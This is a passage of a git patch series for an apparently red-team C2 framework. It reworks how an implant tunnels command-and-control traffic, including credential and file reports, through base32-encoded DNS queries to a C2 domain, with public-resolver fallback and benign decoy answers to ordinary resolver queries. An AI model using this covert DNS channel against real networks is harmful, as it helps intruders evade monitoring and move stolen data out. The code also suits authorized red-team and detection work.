(1.1.1.1:53) in resolver list" + ); + assert!( + has_google, + "Should have Google (8.8.8.8:53) in resolver list" + ); assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); @@ -1749,6 +1820,9 @@ mod tests { let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - assert!(dns.dns_resolvers.is_empty(), "dns_resolvers should be empty with explicit server"); + assert!( + dns.dns_resolvers.is_empty(), + "dns_resolvers should be empty with explicit server" + ); } } diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 26702282b..8e1a04861 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -52,6 +52,29 @@ const ( // Response size limits (to fit in single UDP packet) maxDNSResponseSize = 1400 // Conservative MTU limit maxResponseChunkSize = 1200 // Base32-encoded chunk size + + // DNS response constants + dnsResponseFlags = 0x8180 // Flags: Response, no error (0x81, 0x80) + dnsErrorFlags = 0x8183 // Flags: Response with name error (0x81, 0x83) + dnsPointerToQuestion = 0xC00C // Compression pointer to question at offset 12 + dnsTTLSeconds = 60 // DNS record TTL in seconds + txtMaxChunkSize = 255 // Maximum size of single TXT string + + // Localhost IP addresses (for benign responses) + localhostIPv4Octet1 = 127 + localhostIPv4Octet4 = 1 + localhostIPv6Byte15 = 1 // ::1 has only byte 15 set to 1, rest are 0 + + // Base36 encoding constants + base36Radix = 36 + base36Pow2 = 1296 // 36^2 + base36Pow3 = 46656 // 36^3 + base36Pow4 = 1679616 // 36^4 + + // CRC16-CCITT constants + crc16Init = 0xFFFF + crc16Polynomial = 0x1021 + crc16HighBit = 0x8000 ) func init() { @@ -832,11 +855,11 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans // DNS Header response = append(response, byte(transactionID>>8), byte(transactionID)) - response = append(response, 0x81, 0x80) // Flags: Response, no error - response = append(response, 0x00, 0x01) // Questions: 1 - response = append(response, 0x00, 0x01) // Answers: 1 - response = append(response, 0x00, 0x00) // Authority RRs: 0 - response = append(response, 0x00, 0x00) // Additional RRs: 0 + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) // Flags: Response, no error + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, 0x00, 0x01) // Answers: 1 + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 // Question section (echo the question) for _, label := range strings.Split(domain, ".") { @@ -852,26 +875,26 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans // Answer section // Name (pointer to question) - response = append(response, 0xC0, 0x0C) + response = append(response, byte(dnsPointerToQuestion>>8), byte(dnsPointerToQuestion&0xFF)) // Type: echo query type response = append(response, 0x00, byte(queryType)) // Class: IN response = append(response, 0x00, byte(dnsClassIN)) - // TTL: 60 seconds - response = append(response, 0x00, 0x00, 0x00, 0x3C) + // TTL: dnsTTLSeconds + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // Build RDATA based on query type var rdata []byte switch queryType { case txtRecordType: - // TXT record: split data into 255-byte chunks + // TXT record: split data into txtMaxChunkSize-byte chunks txtData := data var txtChunks [][]byte for len(txtData) > 0 { chunkSize := len(txtData) - if chunkSize > 255 { - chunkSize = 255 + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize } txtChunks = append(txtChunks, txtData[:chunkSize]) txtData = txtData[chunkSize:] @@ -923,22 +946,21 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { response := make([]byte, dnsHeaderSize) binary.BigEndian.PutUint16(response[0:2], transactionID) - response[2] = 0x81 - response[3] = 0x83 // RCODE: Name Error + response[2] = byte(dnsErrorFlags >> 8) + response[3] = byte(dnsErrorFlags & 0xFF) // RCODE: Name Error conn.WriteToUDP(response, addr) } // sendBenignResponse sends a benign DNS response for resolver queries -// Returns 127.0.0.1 for A, ::1 for AAAA, empty TXT for others func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { var data []byte switch queryType { case aRecordType: - data = []byte{127, 0, 0, 1} // localhost + data = []byte{localhostIPv4Octet1, 0, 0, localhostIPv4Octet4} // 127.0.0.1 case aaaaRecordType: data = make([]byte, 16) // ::1 - data[15] = 1 + data[localhostIPv6Byte15] = localhostIPv6Byte15 default: data = []byte{} // empty response } @@ -981,8 +1003,8 @@ func encodeBase36(value int, digits int) string { const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" result := make([]byte, digits) for i := digits - 1; i >= 0; i-- { - result[i] = base36[value%36] - value /= 36 + result[i] = base36[value%base36Radix] + value /= base36Radix } return string(result) } @@ -1006,7 +1028,7 @@ func decodeBase36(encoded string) (int, error) { if err != nil { return 0, err } - result = result*36 + digit + result = result*base36Radix + digit } return result, nil } @@ -1037,14 +1059,14 @@ func decodeBase36CRC(encoded string) (int, error) { return decodeBase36(encoded) } -// CalculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +// CalculateCRC16 computes CRC16-CCITT checksum func CalculateCRC16(data []byte) uint16 { - var crc uint16 = 0xFFFF + var crc uint16 = crc16Init for _, b := range data { crc ^= uint16(b) << 8 for i := 0; i < 8; i++ { - if (crc & 0x8000) != 0 { - crc = (crc << 1) ^ 0x1021 + if (crc & crc16HighBit) != 0 { + crc = (crc << 1) ^ crc16Polynomial } else { crc <<= 1 } From 49f809955088ceb8c5bf3f4c92bf53249ae5adf3 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 21:17:29 -0600 Subject: [PATCH 05/17] updated to dns protobuf --- implants/lib/pb/build.rs | 14 + implants/lib/pb/src/generated/dns.rs | 100 ++ implants/lib/pb/src/lib.rs | 3 + implants/lib/transport/Cargo.toml | 5 +- implants/lib/transport/src/dns.rs | 2062 ++++++------------------ tavern/internal/c2/dnspb/dns.pb.go | 414 +++++ tavern/internal/c2/generate.go | 1 + tavern/internal/c2/proto/dns.proto | 45 + tavern/internal/redirectors/dns/dns.go | 1087 +++++-------- 9 files changed, 1424 insertions(+), 2307 deletions(-) create mode 100644 implants/lib/pb/src/generated/dns.rs create mode 100644 tavern/internal/c2/dnspb/dns.pb.go create mode 100644 tavern/internal/c2/proto/dns.proto diff --git a/implants/lib/pb/build.rs b/implants/lib/pb/build.rs index cfff81dac..5acc469bd 100644 --- a/implants/lib/pb/build.rs +++ b/implants/lib/pb/build.rs @@ -109,5 +109,19 @@ fn main() -> Result<(), Box> { Ok(_) => println!("generated c2 protos"), }; + // Build DNS Protos (no encryption codec - used for transport layer only) + match tonic_build::configure() + .out_dir("./src/generated") + .build_server(false) + .build_client(false) + .compile(&["dns.proto"], &["../../../tavern/internal/c2/proto/"]) + { + Err(err) => { + println!("WARNING: Failed to compile dns protos: {}", err); + panic!("{}", err); + } + Ok(_) => println!("generated dns protos"), + }; + Ok(()) } diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs new file mode 100644 index 000000000..452de3d5e --- /dev/null +++ b/implants/lib/pb/src/generated/dns.rs @@ -0,0 +1,100 @@ +// This file is @generated by prost-build. +/// DNSPacket is the main message format for DNS C2 communication +/// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct DnsPacket { + /// Packet type + #[prost(enumeration = "PacketType", tag = "1")] + pub r#type: i32, + /// Chunk sequence number (0-based) + #[prost(uint32, tag = "2")] + pub sequence: u32, + /// 12-character random conversation ID + #[prost(string, tag = "3")] + pub conversation_id: ::prost::alloc::string::String, + /// Chunk payload (or InitPayload for INIT packets) + #[prost(bytes = "vec", tag = "4")] + pub data: ::prost::alloc::vec::Vec, + /// Optional CRC32 for validation + #[prost(uint32, tag = "5")] + pub crc32: u32, +} +/// InitPayload is the payload for INIT packets +/// It contains metadata about the upcoming data transmission +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct InitPayload { + /// 2-character gRPC method code (e.g., "ct", "fa") + #[prost(string, tag = "1")] + pub method_code: ::prost::alloc::string::String, + /// Total number of data chunks to expect + #[prost(uint32, tag = "2")] + pub total_chunks: u32, + /// CRC32 checksum of complete request data + #[prost(uint32, tag = "3")] + pub data_crc32: u32, +} +/// FetchPayload is the payload for FETCH packets +/// It specifies which response chunk to retrieve +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct FetchPayload { + /// Which chunk to fetch (0-based) + #[prost(uint32, tag = "1")] + pub chunk_index: u32, +} +/// ResponseMetadata indicates the response is chunked and must be fetched +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ResponseMetadata { + /// Total number of response chunks + #[prost(uint32, tag = "1")] + pub total_chunks: u32, + /// CRC32 checksum of complete response data + #[prost(uint32, tag = "2")] + pub data_crc32: u32, + /// Size of each chunk (last may be smaller) + #[prost(uint32, tag = "3")] + pub chunk_size: u32, +} +/// PacketType defines the type of DNS packet in the conversation +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] +#[repr(i32)] +pub enum PacketType { + Unspecified = 0, + /// Establish conversation + Init = 1, + /// Send data chunk + Data = 2, + /// Finalize request + End = 3, + /// Retrieve response chunk + Fetch = 4, +} +impl PacketType { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", + PacketType::Init => "PACKET_TYPE_INIT", + PacketType::Data => "PACKET_TYPE_DATA", + PacketType::End => "PACKET_TYPE_END", + PacketType::Fetch => "PACKET_TYPE_FETCH", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), + "PACKET_TYPE_INIT" => Some(Self::Init), + "PACKET_TYPE_DATA" => Some(Self::Data), + "PACKET_TYPE_END" => Some(Self::End), + "PACKET_TYPE_FETCH" => Some(Self::Fetch), + _ => None, + } + } +} diff --git a/implants/lib/pb/src/lib.rs b/implants/lib/pb/src/lib.rs index f65dc9036..a1c4efaea 100644 --- a/implants/lib/pb/src/lib.rs +++ b/implants/lib/pb/src/lib.rs @@ -4,5 +4,8 @@ pub mod eldritch { pub mod c2 { include!("generated/c2.rs"); } +pub mod dns { + include!("generated/dns.rs"); +} pub mod config; pub mod xchacha; diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index a13831abb..cbda42e4e 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,7 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] -dns = ["dep:data-encoding", "dep:rand", "dep:hickory-resolver"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] mock = ["dep:mockall"] [dependencies] @@ -28,8 +28,9 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -data-encoding = { version = "2.9.0", optional = true } +base32 = { version = "0.5", optional = true } rand = { workspace = true, optional = true } +url = { version = "2.5", optional = true } # [feature = mock] mockall = { workspace = true, optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index a7fcf4ca1..3850d19a5 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,1436 +1,586 @@ -use anyhow::{Context, Result}; +// DNS transport implementation for Realm C2 +// This module provides DNS-based communication with stateless packet protocol + +use anyhow::Result; use pb::c2::*; +use pb::dns::*; use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; - -#[cfg(feature = "dns")] -use hickory_resolver::system_conf::read_system_conf; - use crate::Transport; -// DNS protocol limits -const DNS_HEADER_SIZE: usize = 12; // Standard DNS header size -const MAX_LABEL_LENGTH: usize = 63; // Maximum bytes in a DNS label -const TXT_RECORD_TYPE: u16 = 16; // TXT record QTYPE -const A_RECORD_TYPE: u16 = 1; // A record QTYPE -const AAAA_RECORD_TYPE: u16 = 28; // AAAA record QTYPE -const DNS_CLASS_IN: u16 = 1; // Internet class - -// Record type fallback priority (TXT has highest capacity) -const RECORD_TYPE_PRIORITY: &[u16] = &[TXT_RECORD_TYPE, AAAA_RECORD_TYPE, A_RECORD_TYPE]; - -// Protocol field sizes (base36 encoding) -const TYPE_SIZE: usize = 1; // Packet type: i/d/e/f -const SEQ_SIZE: usize = 5; // Sequence: 36^5 = 60,466,176 max chunks -const CONV_ID_SIZE: usize = 12; // Conversation ID length -const HEADER_SIZE: usize = TYPE_SIZE + SEQ_SIZE + CONV_ID_SIZE; -const MAX_DNS_NAME_LEN: usize = 253; // DNS max total domain name length - -// Packet types -const TYPE_INIT: char = 'i'; // Init: establish conversation -const TYPE_DATA: char = 'd'; // Data: send chunk -const TYPE_END: char = 'e'; // End: finalize and process -const TYPE_FETCH: char = 'f'; // Fetch: retrieve response chunk - -// Response prefixes (TXT records) -const RESP_OK: &str = "ok:"; // Success with data -const RESP_MISSING: &str = "m:"; // Missing chunks list -const RESP_ERROR: &str = "e:"; // Error message -const RESP_CHUNKED: &str = "r:"; // Response chunked metadata - -// Retry configuration -const MAX_RETRIES: usize = 5; -const INIT_TIMEOUT_SECS: u64 = 15; -const CHUNK_TIMEOUT_SECS: u64 = 20; - -// DNS query configuration -const MAX_DNS_PACKET_SIZE: usize = 4096; // Maximum DNS response size -const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // Timeout for individual DNS queries - -// DNS server configuration -const DEFAULT_DNS_PORT: &str = "53"; -const FALLBACK_DNS_CLOUDFLARE: &str = "1.1.1.1"; -const FALLBACK_DNS_GOOGLE: &str = "8.8.8.8"; - -// Base36 encoding math constants (for sequence and CRC encoding) -const BASE36_RADIX: usize = 36; -const BASE36_POW_2: usize = 1296; // 36^2 -const BASE36_POW_3: usize = 46656; // 36^3 -const BASE36_POW_4: usize = 1679616; // 36^4 - -// CRC16-CCITT constants -const CRC16_INIT: u16 = 0xFFFF; -const CRC16_POLYNOMIAL: u16 = 0x1021; -const CRC16_HIGH_BIT: u16 = 0x8000; -const CRC16_LOW_BYTE_MASK: u16 = 0xFF; - -// DNS protocol constants -const DNS_QUERY_FLAG_STANDARD: [u8; 2] = [0x01, 0x00]; -const DNS_COMPRESSION_PTR_MASK: u8 = 0xC0; -const DNS_RCODE_MASK: u8 = 0x0F; - -// Retry and timing constants -const MAX_MISSING_CHUNK_RETRIES: usize = 5; -const MAX_CHUNKED_INDICATOR_FETCHES: usize = 10; -const MISSING_CHUNK_DELAY_MS: u64 = 50; -const BACKOFF_BASE_SECS: u64 = 1; -const BACKOFF_RETRY_DELAY_SECS: u64 = 2; - -// Label size calculation constants -const DNS_LABEL_OVERHEAD_DIVISOR: usize = 64; -const DNS_LABEL_USABLE_RATIO: usize = 63; - -// Base32 encoding ratio (8 bits to 5 bits, so 8/5 expansion) -const BASE32_ENCODE_NUMERATOR: usize = 8; -const BASE32_ENCODE_DENOMINATOR: usize = 5; - -// Binary chunking indicator -const BINARY_CHUNK_MAGIC: u8 = 0xFF; - -// URL parsing constants -const URL_SCHEME_PREFIX: &str = "dns://"; -const SYSTEM_RESOLVER_WILDCARD: &str = "*"; - -// gRPC method paths -static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; -static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; -static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; -static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; -static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; -static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; - -fn marshal_with_codec(msg: Req) -> Result> -where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 'static, -{ - pb::xchacha::encode_with_chacha::(msg) -} - -fn unmarshal_with_codec(data: &[u8]) -> Result -where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 'static, -{ - pb::xchacha::decode_with_chacha::(data) -} +// Protocol limits +const MAX_LABEL_LENGTH: usize = 63; +const MAX_DNS_NAME_LENGTH: usize = 253; +const CONV_ID_LENGTH: usize = 8; -/// Build resolver array: system DNS servers (if available) + fallback servers -/// Returns array with system servers first, then 1.1.1.1:53, then 8.8.8.8:53 -/// If system config fails, returns only [1.1.1.1:53, 8.8.8.8:53] -fn build_resolver_array() -> Vec { - let mut resolvers = Vec::new(); - - // Try to get system DNS servers - #[cfg(feature = "dns")] - match read_system_conf() { - Ok((config, _opts)) => { - // Extract nameserver addresses from system config - for ns in config.name_servers() { - let addr = ns.socket_addr; - let server = format!("{}:{}", addr.ip(), addr.port()); - - // Only add if not already in the list (deduplicate) - if !resolvers.contains(&server) { - resolvers.push(server); - } - } - - #[cfg(debug_assertions)] - if !resolvers.is_empty() { - log::debug!( - "Found {} system DNS servers: {:?}", - resolvers.len(), - resolvers - ); - } else { - log::debug!("System DNS config returned no servers"); - } - } - Err(_e) => { - #[cfg(debug_assertions)] - log::debug!("Failed to read system DNS config: {}", _e); - } - } - - // Always add fallback servers (Cloudflare and Google) - // Add only if not already in the list - let fallbacks = vec![ - format!("{}:{}", FALLBACK_DNS_CLOUDFLARE, DEFAULT_DNS_PORT), - format!("{}:{}", FALLBACK_DNS_GOOGLE, DEFAULT_DNS_PORT), - ]; - for fallback in fallbacks { - if !resolvers.contains(&fallback) { - resolvers.push(fallback); - } - } - - resolvers -} +// DNS resolver fallbacks +const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; -/// Map gRPC method path to 2-character code -/// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, -/// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput -fn method_to_code(method: &str) -> String { - match method { - "/c2.C2/ClaimTasks" => "ct".to_string(), - "/c2.C2/FetchAsset" => "fa".to_string(), - "/c2.C2/ReportCredential" => "rc".to_string(), - "/c2.C2/ReportFile" => "rf".to_string(), - "/c2.C2/ReportProcessList" => "rp".to_string(), - "/c2.C2/ReportTaskOutput" => "rt".to_string(), - _ => "ct".to_string(), - } +/// DNS record type for queries +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum DnsRecordType { + TXT, // Text records (default, base32 encoded) + A, // IPv4 address records (binary data) + AAAA, // IPv6 address records (binary data) } -/// DNS transport implementation -/// -/// Tunnels C2 traffic through DNS queries and responses using a -/// conversation-based protocol with init, data, end, and fetch packets. -/// Supports TXT, A, and AAAA record types with automatic fallback. +/// DNS transport using stateless packet protocol with protobuf #[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // Some(server) = use explicit server, None = use resolver array - dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None - current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, - socket: Option>, - preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) - current_record_type: u16, // Current type (may change after fallback) - enable_fallback: bool, // Whether to try other types on failure + dns_servers: Vec, // Primary + fallback DNS servers + current_server_index: usize, + record_type: DnsRecordType, // DNS record type to use for queries } impl DNS { - /// Calculate maximum data size per chunk - /// After base32-encoding entire packet [type:1][seq:5][convid:12][data...] - /// Base32 expands by 8/5 = 1.6x, so work backwards from DNS name limit - fn calculate_max_data_size(&self) -> usize { - let base_with_dot = self.base_domain.len() + 1; - let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); - - // Account for dots between labels (every 63 chars needs a dot separator) - // If we have N chars, we need ceil(N/63) - 1 dots - // To be safe, estimate: for every 63 chars, we lose 1 char to a dot - // So effective available space is: total_available * 63 / 64 - let effective_available = - (total_available * DNS_LABEL_USABLE_RATIO) / DNS_LABEL_OVERHEAD_DIVISOR; - - // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available - // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = - (effective_available * BASE32_ENCODE_DENOMINATOR) / BASE32_ENCODE_NUMERATOR; - max_raw_packet.saturating_sub(HEADER_SIZE) + /// Marshal request using ChaCha encoding + fn marshal_with_codec(msg: Req) -> Result> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::encode_with_chacha::(msg) } - /// Generate a random conversation ID + /// Unmarshal response using ChaCha encoding + fn unmarshal_with_codec(data: &[u8]) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + pb::xchacha::decode_with_chacha::(data) + } + + /// Generate unique conversation ID fn generate_conv_id() -> String { use rand::Rng; + const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789"; let mut rng = rand::thread_rng(); - let bytes: [u8; 8] = rng.gen(); - Self::encode_base32(&bytes)[..CONV_ID_SIZE].to_string() - } - - fn encode_seq(seq: usize) -> String { - const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let digit4 = (seq / BASE36_POW_4) % BASE36_RADIX; - let digit3 = (seq / BASE36_POW_3) % BASE36_RADIX; - let digit2 = (seq / BASE36_POW_2) % BASE36_RADIX; - let digit1 = (seq / BASE36_RADIX) % BASE36_RADIX; - let digit0 = seq % BASE36_RADIX; - format!( - "{}{}{}{}{}", - BASE36[digit4] as char, - BASE36[digit3] as char, - BASE36[digit2] as char, - BASE36[digit1] as char, - BASE36[digit0] as char - ) - } - - fn decode_seq(encoded: &str) -> Result { - let chars: Vec = encoded.chars().collect(); - if chars.len() != 5 { - return Err(anyhow::anyhow!( - "Invalid sequence length: expected 5, got {}", - chars.len() - )); - } - - let val = |c: char| -> Result { - match c { - '0'..='9' => Ok((c as usize) - ('0' as usize)), - 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), - _ => Err(anyhow::anyhow!("Invalid base36 character")), - } - }; - - Ok(val(chars[0])? * BASE36_POW_4 - + val(chars[1])? * BASE36_POW_3 - + val(chars[2])? * BASE36_POW_2 - + val(chars[3])? * BASE36_RADIX - + val(chars[4])?) - } - - /// Calculate CRC16-CCITT checksum - fn calculate_crc16(data: &[u8]) -> u16 { - let mut crc: u16 = CRC16_INIT; - for byte in data { - crc ^= (*byte as u16) << 8; + (0..CONV_ID_LENGTH) + .map(|_| { + let idx = rng.gen_range(0..CHARSET.len()); + CHARSET[idx] as char + }) + .collect() + } + + /// Calculate CRC32 checksum + fn calculate_crc32(data: &[u8]) -> u32 { + let mut crc = 0xffffffffu32; + for &byte in data { + crc ^= byte as u32; for _ in 0..8 { - if (crc & CRC16_HIGH_BIT) != 0 { - crc = (crc << 1) ^ CRC16_POLYNOMIAL; + if crc & 1 != 0 { + crc = (crc >> 1) ^ 0xedb88320; } else { - crc <<= 1; + crc >>= 1; } } } - crc + !crc } - /// Encode CRC16 to 4-digit base36 (for init payload and response metadata only) - fn encode_base36_crc(crc: u16) -> String { - const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let crc_val = crc as usize; - let digit3 = (crc_val / BASE36_POW_3) % BASE36_RADIX; - let digit2 = (crc_val / BASE36_POW_2) % BASE36_RADIX; - let digit1 = (crc_val / BASE36_RADIX) % BASE36_RADIX; - let digit0 = crc_val % BASE36_RADIX; - format!( - "{}{}{}{}", - BASE36[digit3] as char, - BASE36[digit2] as char, - BASE36[digit1] as char, - BASE36[digit0] as char - ) - } + /// Calculate maximum data size that will fit in DNS query + fn calculate_max_chunk_size(&self) -> usize { + // DNS limit: total_length <= 253 + // Format: . + // total_length = encoded_length + num_dots + base_domain_length + // num_dots = ceil(encoded_length / 63) - 1 + 1 = ceil(encoded_length / 63) - /// Decode 4-digit base36 CRC - fn decode_base36_crc(encoded: &str) -> Result { - let chars: Vec = encoded.chars().collect(); - if chars.len() != 4 { - return Err(anyhow::anyhow!( - "Invalid CRC length: expected 4, got {}", - chars.len() - )); - } + let base_domain_len = self.base_domain.len(); - let val = |c: char| -> Result { - match c { - '0'..='9' => Ok((c as usize) - ('0' as usize)), - 'a'..='z' => Ok((c as usize) - ('a' as usize) + 10), - _ => Err(anyhow::anyhow!("Invalid base36 character in CRC")), - } - }; + // Available for encoded data and its dots + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len + 1); // +1 for dot before base_domain - let crc = val(chars[0])? * BASE36_POW_3 - + val(chars[1])? * BASE36_POW_2 - + val(chars[2])? * BASE36_RADIX - + val(chars[3])?; - Ok(crc as u16) - } + // For every 63 chars of encoded data, we need 1 dot + // So: encoded_length + ceil(encoded_length / 63) <= available + // Rearranging: encoded_length <= available * 63 / 64 + let max_encoded_length = (available * 63) / 64; + + // Base32 encoding: 5 bytes -> 8 chars + // So: encoded_length = ceil(protobuf_length * 8 / 5) + // Rearranging: protobuf_length = floor(encoded_length * 5 / 8) + let max_protobuf_length = (max_encoded_length * 5) / 8; - /// Encode data to lowercase base32 without padding - fn encode_base32(data: &[u8]) -> String { - use data_encoding::BASE32_NOPAD; - BASE32_NOPAD.encode(data).to_lowercase() + // Protobuf overhead: + // - type: 1 byte tag + 1 byte value = 2 bytes + // - sequence: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes + // - conversation_id: 1 byte tag + 1 byte length + 8 bytes string = 10 bytes + // - data: 1 byte tag + varint length (1-2 bytes for our sizes) = 3 bytes + // - crc32: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes + // Total: 2 + 4 + 10 + 3 + 4 = 23 bytes + const PROTOBUF_FIXED_OVERHEAD: usize = 23; + + // Max data size is exactly what fits + max_protobuf_length.saturating_sub(PROTOBUF_FIXED_OVERHEAD) } - /// Decode lowercase base32 data without padding - fn decode_base32(encoded: &str) -> Result> { - use data_encoding::BASE32_NOPAD; - BASE32_NOPAD - .decode(encoded.to_uppercase().as_bytes()) - .context("Failed to decode base32") + /// Encode data using Base32 (DNS-safe, case-insensitive) + fn encode_data(data: &[u8]) -> String { + // Use RFC4648 alphabet (A-Z, 2-7) without padding, converted to lowercase + base32::encode(base32::Alphabet::Rfc4648 { padding: false }, data).to_lowercase() } - /// Build packet subdomain with opaque base32 encoding - /// Entire packet structure is base32-encoded: [type:1][seq:5][convid:12][raw_data_bytes...] - /// This hides the protocol structure from network analysts - fn build_packet( - &self, - pkt_type: char, - seq: usize, - conv_id: &str, - raw_data: &[u8], - ) -> Result { - let max_data_size = self.calculate_max_data_size(); - - let truncated_data = if raw_data.len() > max_data_size { - &raw_data[..max_data_size] - } else { - raw_data - }; + /// Build DNS query subdomain from packet + /// Format: . + /// Base32 data is split into 63-char labels, total length <= 253 chars + fn build_subdomain(&self, packet: &DnsPacket) -> Result { + // Serialize packet to protobuf + let mut buf = Vec::new(); + packet.encode(&mut buf)?; + + // Encode entire packet as Base32 (includes all metadata) + let encoded = Self::encode_data(&buf); - // Build raw packet: [type:1][seq:5][convid:12][raw_bytes...] - let mut packet = Vec::new(); - packet.push(pkt_type as u8); - packet.extend_from_slice(Self::encode_seq(seq).as_bytes()); - packet.extend_from_slice(conv_id.as_bytes()); - packet.extend_from_slice(truncated_data); + // Calculate total length + let base_domain_len = self.base_domain.len(); + let num_labels = (encoded.len() + MAX_LABEL_LENGTH - 1) / MAX_LABEL_LENGTH; + let total_len = encoded.len() + num_labels + base_domain_len; // +num_labels for dots between labels, +1 for dot before base_domain - // Base32-encode entire packet (makes it opaque) - let encoded_packet = Self::encode_base32(&packet); + if total_len > MAX_DNS_NAME_LENGTH { + return Err(anyhow::anyhow!( + "DNS query too long: {} chars (max {}). protobuf={} bytes, encoded={} chars, labels={}, base_domain={} chars. Data in packet was {} bytes.", + total_len, + MAX_DNS_NAME_LENGTH, + buf.len(), + encoded.len(), + num_labels, + base_domain_len, + packet.data.len() + )); + } - // Split into DNS labels (63 chars each) + // Split encoded data let mut labels = Vec::new(); - for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { - labels.push(String::from_utf8_lossy(chunk).to_string()); + let mut remaining = encoded.as_str(); + while remaining.len() > MAX_LABEL_LENGTH { + let (chunk, rest) = remaining.split_at(MAX_LABEL_LENGTH); + labels.push(chunk); + remaining = rest; + } + if !remaining.is_empty() { + labels.push(remaining); } + // Build final domain: ..... + labels.push(&self.base_domain); Ok(labels.join(".")) } - /// Build init packet with plaintext payload - /// Format (before base32): [i][00000][conv_id][method_code:2][total_chunks:5][crc:4] - fn build_init_packet(conv_id: &str, plaintext_payload: &str) -> Result { - // Build raw packet - let mut packet = Vec::new(); - packet.push(TYPE_INIT as u8); - packet.extend_from_slice(Self::encode_seq(0).as_bytes()); - packet.extend_from_slice(conv_id.as_bytes()); - packet.extend_from_slice(plaintext_payload.as_bytes()); + /// Send packet and get response with resolver fallback + async fn send_packet(&mut self, packet: DnsPacket) -> Result> { + let subdomain = self.build_subdomain(&packet)?; + let query = self.build_dns_query(&subdomain)?; - // Base32-encode entire packet - let encoded_packet = Self::encode_base32(&packet); + // Try each 